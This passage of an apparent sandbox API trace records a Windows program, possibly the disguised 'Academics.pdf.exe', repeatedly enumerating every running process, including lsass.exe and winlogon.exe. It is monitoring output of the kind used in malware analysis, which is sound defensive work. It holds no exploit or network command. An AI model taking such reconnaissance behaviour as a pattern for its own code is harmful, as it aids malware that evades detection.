cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0287.051] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0287.052] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0287.053] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0287.053] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0287.054] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0287.055] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0287.056] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0287.057] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0287.058] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0287.058] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0287.059] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0287.060] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0287.061] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.062] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.063] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0287.063] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.064] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0287.065] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.066] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0287.067] CloseHandle (hObject=0x294) returned 1 [0287.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0287.067] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.067] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0287.069] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.070] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0287.071] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0287.072] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.073] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0287.074] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.075] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0287.075] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0287.076] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0287.077] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0287.078] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.080] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.081] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.081] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.082] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0287.083] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.084] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.085] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0287.086] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0287.087] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0287.088] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0287.089] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.090] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0287.090] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0287.091] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0287.092] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0287.093] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0287.094] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0287.095] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0287.095] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0287.096] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0287.097] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0287.098] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0287.099] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0287.100] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0287.101] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0287.102] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0287.102] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0287.103] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0287.104] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0287.105] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0287.106] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.107] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.108] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0287.109] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.109] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0287.110] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.111] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0287.112] CloseHandle (hObject=0x294) returned 1 [0287.112] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.112] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.112] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0287.114] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.115] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0287.116] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0287.117] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.118] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0287.119] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.120] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0287.120] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0287.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0287.122] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0287.123] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.124] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, 